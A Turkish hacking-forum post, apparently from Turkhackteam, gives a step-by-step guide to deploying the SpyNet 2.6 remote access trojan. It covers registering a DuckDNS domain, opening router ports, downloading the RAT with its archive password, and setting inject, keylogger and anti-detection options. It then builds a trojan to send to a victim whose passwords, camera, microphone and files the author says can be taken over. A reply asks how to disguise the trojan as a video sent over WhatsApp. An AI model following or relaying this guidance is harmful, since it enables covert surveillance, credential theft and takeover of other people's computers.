Follow along with the video below to see how to install our site as a web app on your home screen.
Not: This feature may not be available in some browsers.
Güncel /
tyArkadaşlar Merhaba ;
Forumda ''Ratların'' kullanımları çok fazla detaylı verilmediği için bügün sizlere SpyNet 2.6'yı ayrıntılarıyla beraber resimli olarak anlatağım.
No-ip alan arkadaşlarımıza duyuruda buluyorum No ip Türk iplerine engellendiği için vpnlerle siteye girip adreste alsanız portta açsanız bağlantı alamazsınız o yüzden piyasada ücretsiz stabil en iyi dns şuanda Duck Dns'dir o yüzden bunu indireceğiz.
Spynet Nedir ?
Spynet bir rat programıdır. Yani virüstür. Kullanım ayalarını doğru yaptığınız taktirde oluşturduğunuz virüsü karşı tarafa attığınızda bilgisayarını ele geçirmeye yarayan bir programdır. Bu sayede kişinin şifrelerini çalabilir , masaüstünü izleyebilir , sesini dinleyebilir , kamerasını açabilir , bilgisayarını kitleyebilir, kayıt defterine erişebilir , yüklü programlarına eşiebilir ve değiştirebilir , özel belge ve dökümanlarını indirebilirsiniz.
Duck Dns Alımı :
Sitemiz : Duck DNS
![]()
Evet Şimdi Domain adresimizi Oluştuyoruz.
![]()
Spynet 2.6'Tıda kullanacağimiz Domain Adresimiz :
![]()
Duck Dns'yi Bilgisayarımıza İndirelim :
![]()
İndirme işlemine devam ediyoruz :
![]()
Duck Dns '' Java'' Eklentisi ile çalışmaktadır. Bu Hatayı alan akradaşlarım Javayı indiriniz.
![]()
Java Download : Ücretsiz Java Yazılımını İndir
Duck Dns Ayarları :
![]()
Domain Adımızı ve Token kodumuzu Yazıyoruz :
![]()
Duck Dns Ayarlarımız Bitmiştir. Şimdi Port Açmaya Geçiyoruz.
Modemimizin İçerisine girebilmek için İp adresimi öğrenicez. Bunun için Başlat>çalıştır>cmd diyoruz ve konsolu açıyoruz oraya ''ipconfig'' komutunu giriyoruz.
![]()
Port Açma :
![]()
Gelelim En Önemli Kısıma '' Spynet 2.6 '' Server Oluşturma ve Kullanım
Spynet Download : SPYNET 2.6 TURKÇE.rar
Rar Pass : Lorthia988
![]()
Ratımızı Bilgisayara İndirdik Şimdi İnce Ayarlara Başlıyoruz.
![]()
Devam et dedikten sonra bizi böyle bir ekran karşılıyor Gerekli ayarları yapıyoruz
![]()
Şimdi en çok sorunlarla karşılaşılan ve bütün ayarları yaptım ama bağlantım gelmiyor portumda açık ama bir türlü yapamadım diye arkadaşlar için gerekli ''Bağlantı'' yani ''Inject'' ayarlarını gösteriyorum...
![]()
Yazıları Anca sıkıştırdım Zaten rat Türkçe Kısa açıklamaların yeteceğini düşündüm Takıldığınız yerler olursa Ayrıntılı Anlatılır o kısımlar
Ayarlara Devam Ediyoruz ;
![]()
Keylogger Ayarlarımız :
![]()
Anti Ayarlarımız :
![]()
Serverı Tamamlama ve Oluşturma Son Bölümümüz Arkadaşlar ;
![]()
Ayarlarımızı Kontrol Ettikten Sonra Server Oluştur diyoruz , Ve bağlantı almak istediğimiz bilgisayar için Trojanımız hazırlanmış oluyor
Serverımız Kendini Masaüstüne Kaydediyor :
Serverımız acaba çalışıyormu bağlantıyı ve ayarların doğruluğu adına kendimde açıyorum ve SONUÇ : Bağlantı geldi
Dip Not : Kardeşlerim kendi bilgisayarımda tıkladım bütün ayarları yaptım fakat gene bağlantı alamıyorum diyorsanız , Bilgisayarınız güvenlik duvarını kapatın mutlaka bağlantı gelecektir...
Arkadaşlar elimden gelen en iyi anlatımı sizleri sıkmadan , kasmadan , bunaltmadan en sadece ve öz şekilde yapmaya çalıştım. Anlayamadığınız veya takıldığınız yerler olursa , forumdan her zaman ulaşabilirsiniz...
Bi Teşekkürü Çok Görmeyin
SELAMETLE
Eline sağlıkArkadaşlar Merhaba ;
Forumda ''Ratların'' kullanımları çok fazla detaylı verilmediği için bügün sizlere SpyNet 2.6'yı ayrıntılarıyla beraber resimli olarak anlatağım.
No-ip alan arkadaşlarımıza duyuruda buluyorum No ip Türk iplerine engellendiği için vpnlerle siteye girip adreste alsanız portta açsanız bağlantı alamazsınız o yüzden piyasada ücretsiz stabil en iyi dns şuanda Duck Dns'dir o yüzden bunu indireceğiz.
Spynet Nedir ?
Spynet bir rat programıdır. Yani virüstür. Kullanım ayalarını doğru yaptığınız taktirde oluşturduğunuz virüsü karşı tarafa attığınızda bilgisayarını ele geçirmeye yarayan bir programdır. Bu sayede kişinin şifrelerini çalabilir , masaüstünü izleyebilir , sesini dinleyebilir , kamerasını açabilir , bilgisayarını kitleyebilir, kayıt defterine erişebilir , yüklü programlarına eşiebilir ve değiştirebilir , özel belge ve dökümanlarını indirebilirsiniz.
Duck Dns Alımı :
Sitemiz : Duck DNS
![]()
Evet Şimdi Domain adresimizi Oluştuyoruz.
![]()
Spynet 2.6'Tıda kullanacağimiz Domain Adresimiz :
![]()
Duck Dns'yi Bilgisayarımıza İndirelim :
![]()
İndirme işlemine devam ediyoruz :
![]()
Duck Dns '' Java'' Eklentisi ile çalışmaktadır. Bu Hatayı alan akradaşlarım Javayı indiriniz.
![]()
Java Download : Ücretsiz Java Yazılımını İndir
Duck Dns Ayarları :
![]()
Domain Adımızı ve Token kodumuzu Yazıyoruz :
![]()
Duck Dns Ayarlarımız Bitmiştir. Şimdi Port Açmaya Geçiyoruz.
Modemimizin İçerisine girebilmek için İp adresimi öğrenicez. Bunun için Başlat>çalıştır>cmd diyoruz ve konsolu açıyoruz oraya ''ipconfig'' komutunu giriyoruz.
![]()
Port Açma :
![]()
Gelelim En Önemli Kısıma '' Spynet 2.6 '' Server Oluşturma ve Kullanım
Spynet Download : SPYNET 2.6 TURKÇE.rar
Rar Pass : Lorthia988
![]()
Ratımızı Bilgisayara İndirdik Şimdi İnce Ayarlara Başlıyoruz.
![]()
Devam et dedikten sonra bizi böyle bir ekran karşılıyor Gerekli ayarları yapıyoruz
![]()
Şimdi en çok sorunlarla karşılaşılan ve bütün ayarları yaptım ama bağlantım gelmiyor portumda açık ama bir türlü yapamadım diye arkadaşlar için gerekli ''Bağlantı'' yani ''Inject'' ayarlarını gösteriyorum...
![]()
Yazıları Anca sıkıştırdım Zaten rat Türkçe Kısa açıklamaların yeteceğini düşündüm Takıldığınız yerler olursa Ayrıntılı Anlatılır o kısımlar
Ayarlara Devam Ediyoruz ;
![]()
Keylogger Ayarlarımız :
![]()
Anti Ayarlarımız :
![]()
Serverı Tamamlama ve Oluşturma Son Bölümümüz Arkadaşlar ;
![]()
Ayarlarımızı Kontrol Ettikten Sonra Server Oluştur diyoruz , Ve bağlantı almak istediğimiz bilgisayar için Trojanımız hazırlanmış oluyor
Serverımız Kendini Masaüstüne Kaydediyor :
Serverımız acaba çalışıyormu bağlantıyı ve ayarların doğruluğu adına kendimde açıyorum ve SONUÇ : Bağlantı geldi
Dip Not : Kardeşlerim kendi bilgisayarımda tıkladım bütün ayarları yaptım fakat gene bağlantı alamıyorum diyorsanız , Bilgisayarınız güvenlik duvarını kapatın mutlaka bağlantı gelecektir...
Arkadaşlar elimden gelen en iyi anlatımı sizleri sıkmadan , kasmadan , bunaltmadan en sadece ve öz şekilde yapmaya çalıştım. Anlayamadığınız veya takıldığınız yerler olursa , forumdan her zaman ulaşabilirsiniz...
Bi Teşekkürü Çok Görmeyin
SELAMETLE
Spynet'i android cihazlara atamazsın.trojan ismi degişebilirmi mesala ben exe olarak atmak istemiyorum mp4 olarak atmak istiyorum ve wattsapdan atmak istiyorum videyo olarak gözükür mü
Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.